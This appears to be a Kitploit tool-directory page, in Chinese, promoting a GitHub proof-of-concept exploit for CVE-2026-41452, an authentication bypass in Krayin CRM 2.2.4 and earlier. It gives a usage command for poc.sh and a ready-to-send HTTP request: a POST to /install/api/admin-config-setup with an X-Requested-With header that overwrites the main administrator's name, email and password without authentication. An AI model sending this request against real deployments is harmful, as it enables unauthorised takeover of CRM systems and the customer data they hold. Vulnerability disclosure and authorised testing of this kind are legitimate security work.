Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/o-sec/cve-2026-41452-poc
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试身份验证
GitHubo-sec/cve-2026-41452-poc

CVE-2026-41452-poc

针对 CVE-2026-41452 的概念验证漏洞利用,该漏洞是 Krayin CRM <= 2.2.4 中的一个严重身份验证绕过漏洞,允许通过中间件绕过实现未经身份验证的管理员账户接管。

查看仓库
13小时59分前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-41452:Krayin CRM 通过中间件绕过实现管理员账户接管

CVSS v3.1: 9.8 Critical Target: Krayin CRM <= 2.2.4 License: MIT

一个概念验证(PoC),演示了影响 Krayin CRM 2.2.4 版本及更早版本的一个严重缺失身份验证漏洞(CVE-2026-41452)。

该漏洞允许未经身份验证的远程攻击者通过注入特定的 HTTP 头来绕过应用程序的安装中间件逻辑(CanInstall),从而完全覆盖主管理员账户配置。

[!WARNING]
免责声明: 本仓库及其中包含的信息仅供教育目的、安全研究和授权防御性审计使用。未经授权测试或利用计算机系统是严格违法的。作者对本材料的任何滥用不承担任何责任。


漏洞概述

  • CVE ID: CVE-2026-41452

  • 漏洞类型: 缺失身份验证 / 中间件绕过

  • 严重程度: 严重(CVSS 9.8)

  • 受影响软件: Krayin CRM <= 2.2.4

  • 已修复版本: Krayin CRM >= 2.2.5

技术描述

该漏洞存在于应用程序的安装中间件中。未经身份验证的攻击者可以向针对 /install/api/admin-config-setup 端点的特制请求附加 X-Requested-With: XMLHttpRequest 头。这会抑制 CanInstall 中间件中预期的重定向检查,从而暴露一个未经身份验证的 updateOrInsert 数据库操作,该操作针对主系统管理员的硬编码 ID(1)。


概念验证(PoC)

使用方法

在您有权测试的目标实例上运行该脚本:

root@kitploit:~
./poc.sh <TARGET-URL> <USERNAME> <EMAIL> <PASSWORD>

HTTP 请求示例

在底层,该绕过通过以下 HTTP 事务结构触发:

root@kitploit:~
POST /install/api/admin-config-setup HTTP/1.1
Host: target-crm.local
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded

name=test1&[email protected]&password=Password123

参考资料

  • nist cve-2026-41452 detail
下载工具